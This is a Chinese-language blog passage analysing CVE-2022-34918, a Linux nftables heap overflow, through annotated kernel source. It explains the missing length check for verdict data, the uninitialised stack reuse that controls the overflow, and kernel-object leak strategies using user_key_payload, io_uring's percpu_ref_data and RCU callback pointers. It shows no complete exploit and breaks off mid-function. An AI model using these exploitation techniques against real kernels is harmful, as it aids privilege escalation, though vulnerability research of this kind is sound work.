CVE-2022-34918
196082 慢慢好起来

前言

这篇应该是关于nftables类型的最后一篇有写exp的文章,在后续的复现文章只会进行漏洞分析以及利用手法分析。

element简介

在介绍之前不得不先提起一下set集合了。在nftables中,集合算是实现map以及verdict map的重要基础,对于map就是大家熟知的键值对的形式,而verdict map其实也是键值对的形式,不过其具有判决效果,可以进行一系列操作,例如:accept、drop、jump之类的。

nf_tables_newsetelem分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/*
 * Netlink handler for NFT_MSG_NEWSETELEM: add one or more elements to an
 * existing set.  Each nested attribute under NFTA_SET_ELEM_LIST_ELEMENTS
 * is handed to nft_add_set_elem() in turn.
 */
static int nf_tables_newsetelem(struct net *net, struct sock *nlsk,
struct sk_buff *skb, const struct nlmsghdr *nlh,
const struct nlattr *const nla[],
struct netlink_ext_ack *extack)
{
u8 genmask = nft_genmask_next(net);
const struct nlattr *attr;
struct nft_set *set;
struct nft_ctx ctx;
int rem, err;

/* The element list attribute is mandatory for this command. */
if (nla[NFTA_SET_ELEM_LIST_ELEMENTS] == NULL)
return -EINVAL;

/* Build the context (table/family) from the element attributes. */
err = nft_ctx_init_from_elemattr(&ctx, net, skb, nlh, nla, extack,
genmask);
if (err < 0)
return err;

/* Resolve the target set by name or transaction-local set id. */
set = nft_set_lookup_global(net, ctx.table, nla[NFTA_SET_ELEM_LIST_SET],
nla[NFTA_SET_ELEM_LIST_SET_ID], genmask);
if (IS_ERR(set))
return PTR_ERR(set);

/* Constant sets may not be modified once bound. */
if (!list_empty(&set->bindings) && set->flags & NFT_SET_CONSTANT)
return -EBUSY;

/* One nft_add_set_elem() call per nested element attribute. */
nla_for_each_nested (attr, nla[NFTA_SET_ELEM_LIST_ELEMENTS], rem) {
err = nft_add_set_elem(&ctx, set, attr, nlh->nlmsg_flags);
if (err < 0)
return err;
}

/* Re-validate the table if any element requires it (e.g. jump/goto). */
if (net->nft.validate_state == NFT_VALIDATE_DO)
return nft_table_validate(net, ctx.table);

return 0;
}

函数内首先调用nft_ctx_init_from_elemattr函数对ctx进行初始化。随后通过nft_set_lookup_global函数找到set。最后真正添加的函数为nft_add_set_elem

nft_add_set_elem分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
/*
 * Parse one element attribute and insert the element into @set.
 * Excerpt: local declarations and error-unwind labels are elided
 * ("// ......"); see the later excerpt for those.
 *
 * Flow: parse attributes -> build an extension template (tmpl) that
 * records the offset/length of every extension -> parse key/key_end/
 * data -> allocate the element with nft_set_elem_init() -> populate the
 * extensions -> queue a transaction and insert.
 */
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
const struct nlattr *attr, u32 nlmsg_flags)
{
// ......

err = nla_parse_nested_deprecated(nla, NFTA_SET_ELEM_MAX, attr,
nft_set_elem_policy, NULL);
if (err < 0)
return err;

/* A key is always required. */
if (nla[NFTA_SET_ELEM_KEY] == NULL)
return -EINVAL;

/* Start with an empty template (len = sizeof(struct nft_set_ext)). */
nft_set_ext_prepare(&tmpl);

err = nft_setelem_parse_flags(set, nla[NFTA_SET_ELEM_FLAGS], &flags);
if (err < 0)
return err;
if (flags != 0)
nft_set_ext_add(&tmpl, NFT_SET_EXT_FLAGS);

/* Maps require data (unless interval end); plain sets forbid it. */
if (set->flags & NFT_SET_MAP) {
if (nla[NFTA_SET_ELEM_DATA] == NULL &&
!(flags & NFT_SET_ELEM_INTERVAL_END))
return -EINVAL;
} else {
if (nla[NFTA_SET_ELEM_DATA] != NULL)
return -EINVAL;
}

/* Interval-end markers carry no payload of any kind. */
if ((flags & NFT_SET_ELEM_INTERVAL_END) &&
(nla[NFTA_SET_ELEM_DATA] || nla[NFTA_SET_ELEM_OBJREF] ||
nla[NFTA_SET_ELEM_TIMEOUT] || nla[NFTA_SET_ELEM_EXPIRATION] ||
nla[NFTA_SET_ELEM_USERDATA] || nla[NFTA_SET_ELEM_EXPR]))
return -EINVAL;

/* Per-element timeout, falling back to the set-wide default. */
timeout = 0;
if (nla[NFTA_SET_ELEM_TIMEOUT] != NULL) {
if (!(set->flags & NFT_SET_TIMEOUT))
return -EINVAL;
err = nf_msecs_to_jiffies64(nla[NFTA_SET_ELEM_TIMEOUT],
&timeout);
if (err)
return err;
} else if (set->flags & NFT_SET_TIMEOUT) {
timeout = set->timeout;
}

expiration = 0;
if (nla[NFTA_SET_ELEM_EXPIRATION] != NULL) {
if (!(set->flags & NFT_SET_TIMEOUT))
return -EINVAL;
err = nf_msecs_to_jiffies64(nla[NFTA_SET_ELEM_EXPIRATION],
&expiration);
if (err)
return err;
}

/* Per-element expression, or a clone of the set-wide one. */
if (nla[NFTA_SET_ELEM_EXPR] != NULL) {
expr = nft_set_elem_expr_alloc(ctx, set,
nla[NFTA_SET_ELEM_EXPR]);
if (IS_ERR(expr))
return PTR_ERR(expr);

err = -EOPNOTSUPP;
if (set->expr && set->expr->ops != expr->ops)
goto err_set_elem_expr;
} else if (set->expr) {
expr = kzalloc(set->expr->ops->size, GFP_KERNEL);
if (!expr)
return -ENOMEM;

err = nft_expr_clone(expr, set->expr);
if (err < 0)
goto err_set_elem_expr;
}

/* Key length is strictly checked against set->klen inside. */
err = nft_setelem_parse_key(ctx, set, &elem.key.val,
nla[NFTA_SET_ELEM_KEY]);
if (err < 0)
goto err_set_elem_expr;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY, set->klen);

if (nla[NFTA_SET_ELEM_KEY_END]) {
err = nft_setelem_parse_key(ctx, set, &elem.key_end.val,
nla[NFTA_SET_ELEM_KEY_END]);
if (err < 0)
goto err_parse_key;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY_END, set->klen);
}

if (timeout > 0) {
nft_set_ext_add(&tmpl, NFT_SET_EXT_EXPIRATION);
if (timeout != set->timeout)
nft_set_ext_add(&tmpl, NFT_SET_EXT_TIMEOUT);
}

if (expr)
nft_set_ext_add_length(&tmpl, NFT_SET_EXT_EXPR,
expr->ops->size);

if (nla[NFTA_SET_ELEM_OBJREF] != NULL) {
if (!(set->flags & NFT_SET_OBJECT)) {
err = -EINVAL;
goto err_parse_key_end;
}
obj = nft_obj_lookup(ctx->net, ctx->table,
nla[NFTA_SET_ELEM_OBJREF], set->objtype,
genmask);
if (IS_ERR(obj)) {
err = PTR_ERR(obj);
goto err_parse_key_end;
}
nft_set_ext_add(&tmpl, NFT_SET_EXT_OBJREF);
}

if (nla[NFTA_SET_ELEM_DATA] != NULL) {
/*
 * CVE-2022-34918 root cause: for NFT_DATA_VERDICT payloads
 * nft_setelem_parse_data() does NOT enforce
 * desc.len == set->dlen ...
 */
err = nft_setelem_parse_data(ctx, set, &desc, &elem.data.val,
nla[NFTA_SET_ELEM_DATA]);
if (err < 0)
goto err_parse_key_end;

dreg = nft_type_to_reg(set->dtype);
list_for_each_entry (binding, &set->bindings, list) {
struct nft_ctx bind_ctx = {
.net = ctx->net,
.family = ctx->family,
.table = ctx->table,
.chain = (struct nft_chain *)binding->chain,
};

if (!(binding->flags & NFT_SET_MAP))
continue;

err = nft_validate_register_store(&bind_ctx, dreg,
&elem.data.val,
desc.type, desc.len);
if (err < 0)
goto err_parse_data;

if (desc.type == NFT_DATA_VERDICT &&
(elem.data.val.verdict.code == NFT_GOTO ||
elem.data.val.verdict.code == NFT_JUMP))
nft_validate_state_update(ctx->net,
NFT_VALIDATE_NEED);
}

/* ... yet the DATA extension is sized with desc.len here,
 * while nft_set_elem_init() copies set->dlen bytes into it. */
nft_set_ext_add_length(&tmpl, NFT_SET_EXT_DATA, desc.len);
}

/* The full maximum length of userdata can exceed the maximum
* offset value (U8_MAX) for following extensions, therefor it
* must be the last extension added.
*/
ulen = 0;
if (nla[NFTA_SET_ELEM_USERDATA] != NULL) {
ulen = nla_len(nla[NFTA_SET_ELEM_USERDATA]);
if (ulen > 0)
nft_set_ext_add_length(&tmpl, NFT_SET_EXT_USERDATA,
ulen);
}

/* Allocate the element; sizes come from the template built above. */
err = -ENOMEM;
elem.priv = nft_set_elem_init(set, &tmpl, elem.key.val.data,
elem.key_end.val.data, elem.data.val.data,
timeout, expiration, GFP_KERNEL);
if (elem.priv == NULL)
goto err_parse_data;

ext = nft_set_elem_ext(set, elem.priv);
if (flags)
*nft_set_ext_flags(ext) = flags;
if (ulen > 0) {
udata = nft_set_ext_userdata(ext);
udata->len = ulen - 1;
nla_memcpy(&udata->data, nla[NFTA_SET_ELEM_USERDATA], ulen);
}
if (obj) {
*nft_set_ext_obj(ext) = obj;
obj->use++;
}
if (expr) {
memcpy(nft_set_ext_expr(ext), expr, expr->ops->size);
kfree(expr);
expr = NULL;
}

trans = nft_trans_elem_alloc(ctx, NFT_MSG_NEWSETELEM, set);
if (trans == NULL)
goto err_trans;

/* Mark busy in the current generation, then insert into the backend. */
ext->genmask = nft_genmask_cur(ctx->net) | NFT_SET_ELEM_BUSY_MASK;
err = set->ops->insert(ctx->net, set, &elem, &ext2);
}

首先判断是否存在key,接着调用nft_set_ext_prepare初始化tmpl

1
2
3
4
5
6
7
8
9
10
/*
 * Extension template: for each extension id, the byte offset at which that
 * extension will live inside the element, plus the running total length.
 */
struct nft_set_ext_tmpl {
u16 len;
u8 offset[NFT_SET_EXT_NUM];
};

/* Reset the template: no extensions yet, length = bare ext header size. */
static inline void nft_set_ext_prepare(struct nft_set_ext_tmpl *tmpl)
{
memset(tmpl, 0, sizeof(*tmpl));
tmpl->len = sizeof(struct nft_set_ext);
}

接着通过nft_setelem_parse_flags拿到用户传入的flag,并且通过nft_set_ext_add函数给tmpl添加flag对应的长度。

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
 * Reserve room for extension @id: align the running length to the
 * extension's required alignment, record the offset, then grow the total
 * by the extension's fixed size plus the caller-supplied variable @len.
 * The BUG_ON keeps offsets representable in the u8 offset[] array.
 */
static inline void nft_set_ext_add_length(struct nft_set_ext_tmpl *tmpl, u8 id,
unsigned int len)
{
tmpl->len = ALIGN(tmpl->len, nft_set_ext_types[id].align);
BUG_ON(tmpl->len > U8_MAX);
tmpl->offset[id] = tmpl->len;
tmpl->len += nft_set_ext_types[id].len + len;
}

/* Convenience wrapper for fixed-size extensions (no variable part). */
static inline void nft_set_ext_add(struct nft_set_ext_tmpl *tmpl, u8 id)
{
nft_set_ext_add_length(tmpl, id, 0);
}

随后对set的类型进行判断以及对用户是否输入对应的值进行判断。

后面是对timeout和expiration进行设置。

然后如果需要创建expr则会生成expr,如果用户没有指定并且set存在expr则会直接clone一个。

下面就是比较重要的调用nft_setelem_parse_key函数解析用户传入的key。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/*
 * Parse a nested NFTA_DATA_* attribute into @data and describe the result
 * (type and length) in @desc.  A raw value goes through nft_value_init();
 * a verdict goes through nft_verdict_init() (only when a ctx is present).
 */
int nft_data_init(const struct nft_ctx *ctx, struct nft_data *data,
unsigned int size, struct nft_data_desc *desc,
const struct nlattr *nla)
{
struct nlattr *tb[NFTA_DATA_MAX + 1];
int err;

err = nla_parse_nested_deprecated(tb, NFTA_DATA_MAX, nla,
nft_data_policy, NULL);
if (err < 0)
return err;

if (tb[NFTA_DATA_VALUE])
return nft_value_init(ctx, data, size, desc,
tb[NFTA_DATA_VALUE]);
if (tb[NFTA_DATA_VERDICT] && ctx != NULL)
return nft_verdict_init(ctx, data, desc, tb[NFTA_DATA_VERDICT]);
return -EINVAL;
}
EXPORT_SYMBOL_GPL(nft_data_init);

/*
 * Parse a set element key.  The key must be a plain value whose length
 * matches the set's declared key length exactly — note that unlike the
 * data path there is no verdict escape hatch here.
 */
static int nft_setelem_parse_key(struct nft_ctx *ctx, struct nft_set *set,
struct nft_data *key, struct nlattr *attr)
{
struct nft_data_desc desc;
int err;

err = nft_data_init(ctx, key, NFT_DATA_VALUE_MAXLEN, &desc, attr);
if (err < 0)
return err;

/* Reject non-values and length mismatches against set->klen. */
if (desc.type != NFT_DATA_VALUE || desc.len != set->klen) {
nft_data_release(key, desc.type);
return -EINVAL;
}

return 0;
}

这里面主要是调用了nft_data_init函数,而其内部就是我们较为熟悉的nla_parse_nested_deprecated,最终会将attr中的内容放入到tb中,之后根据不同的类型进入到下方不同的函数中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
 * Copy a raw value attribute into @data.  The length is only bounded by
 * @size (NFT_DATA_VALUE_MAXLEN on the set element path); checking
 * desc->len against the expected length is left to the caller.
 */
static int nft_value_init(const struct nft_ctx *ctx, struct nft_data *data,
unsigned int size, struct nft_data_desc *desc,
const struct nlattr *nla)
{
unsigned int len;

len = nla_len(nla);
if (len == 0)
return -EINVAL;
if (len > size)
return -EOVERFLOW;

nla_memcpy(data->data, nla, len);
desc->type = NFT_DATA_VALUE;
desc->len = len;
return 0;
}

这里以NFTA_DATA_VALUE为例,其目的就是将tb中的内容写到key中,并设置desc的类型与长度,出来之后判断其类型是否为NFTA_DATA_VALUE以及长度是否和set->klen一致。

在完成对传入的key的解析之后会调用nft_set_ext_add_length函数维持tmpl。

再往后又是继续分析NFTA_SET_ELEM_DATA中的内容,并写入到&elem.data.val

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
 * Parse element data.  NOTE (CVE-2022-34918): the length check below is
 * bypassed whenever desc->type == NFT_DATA_VERDICT, so desc->len may end
 * up different from set->dlen — the mismatch that later causes the heap
 * overflow in nft_set_elem_init().
 */
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
struct nft_data_desc *desc,
struct nft_data *data, struct nlattr *attr)
{
int err;

err = nft_data_init(ctx, data, NFT_DATA_VALUE_MAXLEN, desc, attr);
if (err < 0)
return err;

/* Length is only enforced for non-verdict data. */
if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) {
nft_data_release(data, desc->type);
return -EINVAL;
}

return 0;
}

在完成上述对传入的内容检测以及解析之后会调用nft_set_elem_init对element进行初始化。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
 * Allocate and populate a set element.  The allocation is sized from the
 * template (whose DATA extension was added with desc.len), but the data
 * memcpy below copies set->dlen bytes.  If the two disagree
 * (CVE-2022-34918) this is a heap out-of-bounds write.
 */
void *nft_set_elem_init(const struct nft_set *set,
const struct nft_set_ext_tmpl *tmpl, const u32 *key,
const u32 *key_end, const u32 *data, u64 timeout,
u64 expiration, gfp_t gfp)
{
struct nft_set_ext *ext;
void *elem;

/* Backend private header + all extensions recorded in the template. */
elem = kzalloc(set->ops->elemsize + tmpl->len, gfp);
if (elem == NULL)
return NULL;

ext = nft_set_elem_ext(set, elem);
nft_set_ext_init(ext, tmpl);

memcpy(nft_set_ext_key(ext), key, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
memcpy(nft_set_ext_key_end(ext), key_end, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
/* Copies set->dlen bytes into a desc.len-sized slot. */
memcpy(nft_set_ext_data(ext), data, set->dlen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPIRATION)) {
*nft_set_ext_expiration(ext) = get_jiffies_64() + expiration;
if (expiration == 0)
*nft_set_ext_expiration(ext) += timeout;
}
if (nft_set_ext_exists(ext, NFT_SET_EXT_TIMEOUT))
*nft_set_ext_timeout(ext) = timeout;

return elem;
}

这里首先通过申请set->ops->elemsize + tmpl->len大小的堆块。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/* Resolve the address of extension @id from its recorded byte offset. */
static inline void *nft_set_ext(const struct nft_set_ext *ext, u8 id)
{
return (void *)ext + ext->offset[id];
}

/* Address of the KEY extension. */
static inline struct nft_data *nft_set_ext_key(const struct nft_set_ext *ext)
{
return nft_set_ext(ext, NFT_SET_EXT_KEY);
}

/* Address of the KEY_END extension (ranged sets). */
static inline struct nft_data *nft_set_ext_key_end(const struct nft_set_ext *ext)
{
return nft_set_ext(ext, NFT_SET_EXT_KEY_END);
}

/* Address of the DATA extension (maps). */
static inline struct nft_data *nft_set_ext_data(const struct nft_set_ext *ext)
{
return nft_set_ext(ext, NFT_SET_EXT_DATA);
}

/* The extension area starts right after the backend's private header. */
static inline struct nft_set_ext *nft_set_elem_ext(const struct nft_set *set,
void *elem)
{
return elem + set->ops->elemsize;
}

然后通过nft_set_elem_ext函数拿到ext,随后直接调用对应的函数取出偏移通过下面的memcpy向内部写入前面解析出来的内容。

后面就是把前面的expr,obj之类的也给一并写入到ext中。

上述就是申请element的总体逻辑,可以看出来的这里tmpl的作用是记录数据大小以及其对应的偏移。

漏洞分析

这里浅浅来一个前情提要,在上一篇文章中,nftables子系统浅分析分析了set的申请过程,在nf_tables_newset函数中,会对set的成员进行赋值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// ......
INIT_LIST_HEAD(&set->bindings);
set->table = table;
write_pnet(&set->net, net);
set->ops = ops;
set->ktype = ktype;
set->klen = desc.klen;
set->dtype = dtype;
set->objtype = objtype;
set->dlen = desc.dlen;
set->expr = expr;
set->flags = flags;
set->size = desc.size;
set->policy = policy;
set->udlen = udlen;
set->udata = udata;
set->timeout = timeout;
set->gc_int = gc_int;
set->handle = nf_tables_alloc_handle(table);

set->field_count = desc.field_count;
// ......

这里就可以看到熟悉的set->dlen,可以看到其是由desc.dlen赋值的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// ......
dtype = 0;
if (nla[NFTA_SET_DATA_TYPE] != NULL) {
if (!(flags & NFT_SET_MAP))
return -EINVAL;

dtype = ntohl(nla_get_be32(nla[NFTA_SET_DATA_TYPE]));
if ((dtype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK &&
dtype != NFT_DATA_VERDICT)
return -EINVAL;

if (dtype != NFT_DATA_VERDICT) {
if (nla[NFTA_SET_DATA_LEN] == NULL)
return -EINVAL;
desc.dlen = ntohl(nla_get_be32(nla[NFTA_SET_DATA_LEN]));
if (desc.dlen == 0 || desc.dlen > NFT_DATA_VALUE_MAXLEN)
return -EINVAL;
} else
desc.dlen = sizeof(struct nft_verdict);
} else if (flags & NFT_SET_MAP)
return -EINVAL;
// ......

可以看到这里的desc.dlen是直接由用户传入的。

漏洞原理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
 * (Repeated for the vulnerability analysis.)  The desc->len == set->dlen
 * check is skipped for NFT_DATA_VERDICT, letting the two lengths diverge.
 */
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
struct nft_data_desc *desc,
struct nft_data *data, struct nlattr *attr)
{
int err;

err = nft_data_init(ctx, data, NFT_DATA_VALUE_MAXLEN, desc, attr);
if (err < 0)
return err;

/* Verdict-typed data sidesteps the dlen check entirely. */
if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) {
nft_data_release(data, desc->type);
return -EINVAL;
}

return 0;
}

可以看到在解析value的时候,最后的判断会因为类型是NFT_DATA_VERDICT而不会进入到后面的长度检查,也就是说这里的desc->len与set->dlen是可以不一致的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
 * (Repeated for the vulnerability analysis.)  Allocation size is template
 * driven (desc.len for DATA) while the copy length is set->dlen — the
 * mismatch is the out-of-bounds write.
 */
void *nft_set_elem_init(const struct nft_set *set,
const struct nft_set_ext_tmpl *tmpl, const u32 *key,
const u32 *key_end, const u32 *data, u64 timeout,
u64 expiration, gfp_t gfp)
{
struct nft_set_ext *ext;
void *elem;

elem = kzalloc(set->ops->elemsize + tmpl->len, gfp);
if (elem == NULL)
return NULL;

ext = nft_set_elem_ext(set, elem);
nft_set_ext_init(ext, tmpl);

memcpy(nft_set_ext_key(ext), key, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
memcpy(nft_set_ext_key_end(ext), key_end, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
/* OOB write when set->dlen > desc.len (CVE-2022-34918). */
memcpy(nft_set_ext_data(ext), data, set->dlen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPIRATION)) {
*nft_set_ext_expiration(ext) = get_jiffies_64() + expiration;
if (expiration == 0)
*nft_set_ext_expiration(ext) += timeout;
}
if (nft_set_ext_exists(ext, NFT_SET_EXT_TIMEOUT))
*nft_set_ext_timeout(ext) = timeout;

return elem;
}

在desc->len与set->dlen不一致的情况下,这里的memcpy就会出现意想不到的效果。

如果在申请set时我们控制set->dlen小于NFT_DATA_VALUE_MAXLEN并在申请element时控制data的长度小于set->dlen那么在上面初始化element的时候则会发生堆溢出。

漏洞利用

前面已经分析出了漏洞的表现形式,目前所遇到的问题是我们没法直接控制溢出后的内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 * Excerpt of nf_tables_newsetelem(): every nested element attribute gets
 * its own nft_add_set_elem() call — i.e. a fresh stack frame per element,
 * which the exploit uses to control leftover stack contents.
 */
static int nf_tables_newsetelem(struct net *net, struct sock *nlsk,
struct sk_buff *skb, const struct nlmsghdr *nlh,
const struct nlattr *const nla[],
struct netlink_ext_ack *extack)
{
// ......

nla_for_each_nested (attr, nla[NFTA_SET_ELEM_LIST_ELEMENTS], rem) {
err = nft_add_set_elem(&ctx, set, attr, nlh->nlmsg_flags);
if (err < 0)
return err;
}

// ......
}

这里回过头看申请element的回调函数,可以注意到的是,在面对nla中存在多个element时,是通过for循环调用nft_add_set_elem申请的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
/*
 * Excerpt showing the local declarations and the error-unwind path of
 * nft_add_set_elem().  Note that `elem` is a stack variable that is never
 * zero-initialized; on the success path the function returns 0 without
 * clearing it, so a later call in the same syscall reuses the old stack
 * bytes — this is what lets the exploit choose the overflowed contents.
 */
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
const struct nlattr *attr, u32 nlmsg_flags)
{
struct nlattr *nla[NFTA_SET_ELEM_MAX + 1];
u8 genmask = nft_genmask_next(ctx->net);
struct nft_set_ext_tmpl tmpl;
struct nft_set_ext *ext, *ext2;
/* Uninitialized stack object reused across consecutive calls. */
struct nft_set_elem elem;
struct nft_set_binding *binding;
struct nft_object *obj = NULL;
struct nft_expr *expr = NULL;
struct nft_userdata *udata;
struct nft_data_desc desc;
enum nft_registers dreg;
struct nft_trans *trans;
u32 flags = 0;
u64 timeout;
u64 expiration;
u8 ulen;
int err;

// ......

return 0;

/* Error unwind: release resources in reverse acquisition order. */
err_set_full:
set->ops->remove(ctx->net, set, &elem);
err_element_clash:
kfree(trans);
err_trans:
if (obj)
obj->use--;

nf_tables_set_elem_destroy(ctx, set, elem.priv);
err_parse_data:
if (nla[NFTA_SET_ELEM_DATA] != NULL)
nft_data_release(&elem.data.val, desc.type);
err_parse_key_end:
nft_data_release(&elem.key_end.val, NFT_DATA_VALUE);
err_parse_key:
nft_data_release(&elem.key.val, NFT_DATA_VALUE);
err_set_elem_expr:
if (expr != NULL)
nft_expr_destroy(ctx, expr);

return err;
}

nft_add_set_elem函数对变量的定义可以看到其对elem的定义是定义在栈上的,并且在中途不出现问题的情况下是直接通过return 0进行返回的,这也就意味着该函数栈上的内容是未经过修改的并且也没有初始化,也就意味着可以通过申请两个element来控制第二次写入时的内容。

利用手法分析

这里的利用手法很多,因为很久没玩内核的缘故为了能够与时俱进一点所以这里就都给分析一遍的好。

leak手法

首先这里先简单介绍一下leak手法,因为上面的在nft_add_set_elem的限制导致在为elem申请堆块时只能从kmalloc-64、kmalloc-128、kmalloc-192中申请。

这里最多可以溢出的字节数为48所以从目前来看我们熟悉的struct msg_msg结构体是可以使用的,不过可惜的是这里申请elem的所使用的标识为GFP_KERNEL,考虑到容易出现堆隔离无奈放弃。

最终这里选择使用见面次数不多的user_key_payload结构体来进行leak。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/*
 * Preparse a "user"-type key payload: bounds-check the user-supplied
 * length (1..32767) and allocate header + data in a single GFP_KERNEL
 * kmalloc — so the slab cache is chosen directly by the caller's datalen,
 * which makes this object convenient for heap grooming.
 */
int user_preparse(struct key_preparsed_payload *prep)
{
struct user_key_payload *upayload;
size_t datalen = prep->datalen;

if (datalen <= 0 || datalen > 32767 || !prep->data)
return -EINVAL;

upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
if (!upayload)
return -ENOMEM;

/* attach the data */
prep->quotalen = datalen;
prep->payload.data[0] = upayload;
upayload->datalen = datalen;
memcpy(upayload->data, prep->data, datalen);
return 0;
}
EXPORT_SYMBOL_GPL(user_preparse);

這是其申請過程,可以看到其標識位爲GFP_KERNEL,並且其申請大小是用戶可控的。

1
2
3
4
5
/*
 * In-slab layout of a user-type key payload: a 16-byte rcu_head, the
 * 2-byte datalen, then the inline data.  Corrupting datalen turns
 * user_read() into an out-of-bounds heap read.
 */
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};

觀察其結構體可以發現其類似於msg_msg,也是由datalen來控制其長度的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Copy a key's payload back to userspace.  The copy length is clamped to
 * upayload->datalen, so an attacker who enlarges datalen (e.g. via the
 * nft element overflow) reads past the end of the allocation.
 */
long user_read(const struct key *key, char *buffer, size_t buflen)
{
const struct user_key_payload *upayload;
long ret;

upayload = user_key_payload_locked(key);
ret = upayload->datalen;

/* we can return the data as is */
if (buffer && buflen > 0) {
if (buflen > upayload->datalen)
buflen = upayload->datalen;

memcpy(buffer, upayload->data, buflen);
}

return ret;
}

所以如果我們可以修改掉user_key_payload->datalen即可實現越界讀取。

這裏關於泄露什麼內容存在兩種不同的門派。

第一種是通過在io_uring_setup设置io_uring上下文时会创建percpu_ref_data结构体,其大小为56正好会在上面的kmalloc-64中申请堆块并且申请的标识位为GFP_KERNEL。这种方法的做法就是同时申请user_key_payloadpercpu_ref_data结构体,那么极可能存在两个结构体相邻的情况,此时如果申请的elem紧邻与user_key_payload即可通过修改其datalen成员达到越界读取的效果。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/*
 * Excerpt: percpu_ref_init() kzalloc's a struct percpu_ref_data with the
 * caller's gfp flags and stores both a function pointer (->release, kernel
 * text) and a pointer back into the embedding object (->ref) — both useful
 * leak targets when this object is sprayed next to a corruptible reader.
 */
int percpu_ref_init(struct percpu_ref *ref, percpu_ref_func_t *release,
unsigned int flags, gfp_t gfp)
{
size_t align = max_t(size_t, 1 << __PERCPU_REF_FLAG_BITS,
__alignof__(unsigned long));
unsigned long start_count = 0;
struct percpu_ref_data *data;

ref->percpu_count_ptr = (unsigned long)
__alloc_percpu_gfp(sizeof(unsigned long), align, gfp);
if (!ref->percpu_count_ptr)
return -ENOMEM;

/* sizeof(*ref->data) is 56 bytes, i.e. a kmalloc-64 allocation. */
data = kzalloc(sizeof(*ref->data), gfp);
if (!data) {
free_percpu((void __percpu *)ref->percpu_count_ptr);
ref->percpu_count_ptr = 0;
return -ENOMEM;
}

data->force_atomic = flags & PERCPU_REF_INIT_ATOMIC;
data->allow_reinit = flags & PERCPU_REF_ALLOW_REINIT;

// ......

/* Kernel text pointer and back-pointer into the embedding object. */
data->release = release;
data->confirm_switch = NULL;
data->ref = ref;
ref->data = data;
return 0;
}
EXPORT_SYMBOL_GPL(percpu_ref_init);

通过对percpu_ref_data的初始化函数可以看到这里会给其release成员赋值release函数,以及会给ref成员赋值ref。

1
2
3
if (percpu_ref_init(&ctx->refs, io_ring_ctx_ref_free,
PERCPU_REF_ALLOW_REINIT, GFP_KERNEL))
goto err;

因为在调用时传入的ref是上述形式,所以这里传入的ref其实是ctx结构体refs成员的偏移地址,也就是依旧落在ctx堆块上。

(因为在5.10低版本不存在io_uring所以上述代码使用的是5.19)

第二种leak方式则是利用user_key_payload的rcu成员。

1
2
3
4
5
/*
 * Generic RCU callback node.  ->func is only filled in when the callback
 * is queued (see call_rcu()), so during the grace period it holds a
 * kernel text address that an OOB read can leak.
 */
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

可以看到這裏存在一個func指針,他是在被撤銷時纔會被賦值。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * Revoke a user-type key: release its quota, detach the payload and defer
 * the free to RCU.  call_rcu() writes user_free_payload_rcu into
 * upayload->rcu.func, which remains readable until the grace period ends.
 */
void user_revoke(struct key *key)
{
